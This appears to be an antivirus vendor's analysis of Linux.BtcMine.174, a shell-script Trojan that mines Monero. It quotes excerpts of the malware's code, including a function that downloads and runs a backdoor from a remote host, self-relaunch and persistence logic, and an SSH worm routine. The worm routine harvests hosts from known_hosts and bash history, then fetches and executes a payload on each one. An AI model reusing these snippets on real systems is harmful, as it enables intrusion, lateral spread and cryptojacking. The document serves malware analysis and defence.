Linux.BtcMine.174

9ae9233c79390495e607059870671c9936c413c5

b59fc07afc9f159562f71b3a21c38b1d471acc2f

A multicomponent malware program capable of infecting Linux devices and intended to be used for Monero (XMR) mining. It is implemented as a shell script containing over 1,000 lines of code.

When launched, it checks whether the server, from which the Trojan will subsequently download additional modules, is available:

function GetDownloadPath() { paths=("/usr/bin" "/bin" "/lib" "/boot" "/tmp" "/home/`whoami`" "`pwd`") for path in ${paths[@]} do if [ -x $path ] && [ -r $path ] && [ -w $path ] then DownloadPath=$path break fi done }

If the script is not run with /sbin/init, the following actions are performed:

The script is moved to a previously selected folder with write permissions (rwx) that is named diskmanagerd (the name is specified in the $WatchDogName variable). The script tries to restart using nohup or just in the background if nohup is not installed (in this case, the Trojan installs the coreutils package).

WatchDogName="diskmanagerd" arg=$1 #... function Nohup() { if [ "$arg" != "/sbin/init" ] then rm -f $DownloadPath$WatchDogName >/dev/null 2>&1 cp -rf $0 $DownloadPath$WatchDogName chmod 755 $DownloadPath$WatchDogName >/dev/null 2>&1 rm -f $0 nohup --help >/dev/null 2>&1 if [ $? -eq 0 ] then nohup $DownloadPath$WatchDogName "/sbin/init"> $DownloadPath.templog 2>&1 & exit else if [ `id -u` -eq "0" ] then yum install coreutils -y >/dev/null 2>&1 apt-get install coreutils -y >/dev/null 2>&1 sleep 30 fi (exec $DownloadPath$WatchDogName "/sbin/init" &> /dev/null &) exit fi fi }

Then the Trojan downloads and runs a version of the Linux.BackDoor.Gates.9 Trojan. This family of backdoors allows commands issued by cybercriminals to be executed and DDoS attacks to be carried out:

function oh_cause_she_is_dead() { md5sum --help >/dev/null 2>&1 if [ "$?" = "0" ] then if [ `id -u` -eq "0" ] then DownloadFile "md5" "$mdfive_root" "http://$remote_host/syn" "$DownloadPath$DownloadFileName" else DownloadFile "md5" "$mdfive_user" "http://$remote_host/udp" "$DownloadPath$DownloadFileName" fi else if [ `id -u` -eq "0" ] then DownloadFile "size" "$DownloadFileSize" "http://$remote_host/syn" "$DownloadPath$DownloadFileName" else DownloadFile "size" "$DownloadFileSize" "http://$remote_host/udp" "$DownloadPath$DownloadFileName" fi fi chmod 755 "$DownloadPath$DownloadFileName" $DownloadPath$DownloadFileName }

After that, the malware program searches for other miners and removes them when it detects them. For this, it scans /proc/${pid}/exe and /proc/${pid}/cmdline to check for specific lines (cryptonight, stratum+tcp, etc.).

If Linux.BtcMine.174 was not launched as root, it downloads and runs another shell script (SHA1: 9ae9233c79390495e607059870671c9936c413c5) from the attackers’ server, which, in turn, downloads and runs a number of exploits to escalate the privileges of Linux.Exploit.CVE-2016-5195 (DirtyCow) and Linux.Exploit.CVE-2013-2094 in the system.

In the next step, the script checks to see whether it is running as root. If it is, it stops services, removes their files using package managers, and empties the directories. The names of the following services are listed in the script: safedog, aegis, yunsuo, clamd, avast, avgd, cmdavd, cmdmgd, drweb-configd, drweb-spider-kmod, esets, xmirrord.

Then the Trojan adds itself to the Autorun list, using /etc/rc.local, /etc/rc.d/..., /etc/cron.hourly. After that, it downloads and launches a rootkit, also executed as a shell script. Among the rootkit module’s notable features is the ability to steal user-entered passwords for the su command and to hide files in the file system, network connections, and running processes.

After that, the Trojan runs a feature that collects data from various sources about all the hosts to which the current user has previously connected via SSH. The Trojan tries to connect to these hosts and infect them:

cat /root/.ssh/known_hosts|grep -v ,|awk '{print $1}' > /tmp/.h cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h cat /root/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h cat /home/*/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h cat /home/*/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h cat /home/*/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h cat /root/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h cat /root/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h cat /tmp/.h|grep -v 127.0.0.1|grep -v localhost|sort -u > /tmp/.hh cat /tmp/.hh > /tmp/.h rm -rf /tmp/.hh for i in `cat /tmp/.h` do ( exec ssh -oStrictHostKeyChecking=no -oCheckHostIP=no `whoami`@$i "wget -c -O /tmp/ ;curl -o /tmp/ ;python -c \"import urllib;urllib.urlretrieve(\\\"\\\", \\\"/tmp/\\\")\";php -r '\$f=fopen(\"'/tmp/'\",\"w\");fwrite(\$f, implode(\"\",@file(\"''\")));fclose(\$f);';ruby -e \"require 'open-uri';File.open('/tmp/', 'w') {|f| f.write(open('') {|f1| f1.read})}\";perl -MNet::FTP -e \"\\\$ftp = Net::FTP->new(\\\"\\\");\\\$ftp->login('', '');\\\$ftp->binary;\\\$ftp->get(\\\"\\\",\\\"/tmp/\\\")\";chmod 755 /tmp/;(exec /tmp/ &> /dev/null &)" &> /dev/null & ) done

Next, the Trojan launches and maintains a Monero (XMR) miner. In an infinite loop, the script checks for updates on a remote server so that it can download and install them if they become available. To do that, it carries out the following actions:

The current script version number is stored to the $shell_ver variable. The file http://${remote_host}:${remote_port}/shell_ver.txt is downloaded. The obtained version is checked against the current one. If they match, nothing happens; if they do not match, the Trojan downloads the new script version from the management server.

News about the Trojan